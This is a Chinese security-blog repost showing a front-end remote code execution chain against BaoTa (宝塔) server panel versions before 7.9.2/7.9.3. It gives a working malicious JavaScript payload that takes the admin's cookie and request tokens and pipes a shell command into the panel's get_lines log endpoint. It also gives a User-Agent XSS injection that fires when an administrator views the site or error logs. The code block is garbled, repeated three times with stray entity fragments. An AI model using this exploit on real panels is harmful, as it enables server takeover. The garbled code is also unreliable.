宝塔面板前台RCE

admin
admin
admin
101402
文章
87
评论
2022年10月29日17:42:34评论318 views字数 3942阅读13分8秒阅读模式

RCE1

版本 < 7.9.2

恶意 js

//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\$&") +"\s*\=\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});amp;") +"\s*\=\s*([^;]*).*$)|^.*//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) {    if (!sKey) { return null; }    return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\s*" +encodeURIComponent(sKey).replace(/[-.+*]/g, "\$&") +"\s*\=\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});quot;), "$1")) || null;}
all_headers ={    "Accept":"*/*",    "X-Requested-With":"XMLHttpRequest",    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",    "Connection":"close",    "Accept-Encoding":"gzip, deflate",    "dnt":"1",    "sec-gpc":"1",    "Cookie": cookies,    "x-cookie-token": getCookie('request_token'),    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",    "x-http-token": $('#request_token_head').attr('token'),    "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({    url: "/ajax",    type: "get",    data:        {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"}  //这边填写shell命令    ,    headers: all_headers,    success: function (data) {        console.info(data);    }});

访问宝塔面板部署的网站,并替换 UA

</tExtArEa>">src=https://localhost/1.js></script>

宝塔面板前台RCE

到后台点击日志,触发 xss 导致 rce

宝塔面板前台RCE

命令执行结果

宝塔面板前台RCE

RCE2

版本 <7.9.2
原理和上面的一致,poc 也一样

触发 Nginx 报错
宝塔面板前台RCE

到后台点日志-错误日志

宝塔面板前台RCE

验证结果

宝塔面板前台RCE

RCE3

版本 <7.9.3

可以确认的是有 Xss 漏洞,但是 rec 有难度,我本地使用的是宝塔 7.6.0 验证,存在斜杠替换的问题,暂且不表。

针对 面板页面构造恶意xss

宝塔面板前台RCE

到安全-日志记录中去查找日志。

文章转载自:https://www.ankio.net/#/posts/79

原文始发于微信公众号(利刃信安):宝塔面板前台RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日17:42:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   宝塔面板前台RCEhttp://cn-sec.com/archives/1379419.html

发表评论

匿名网友 填写信息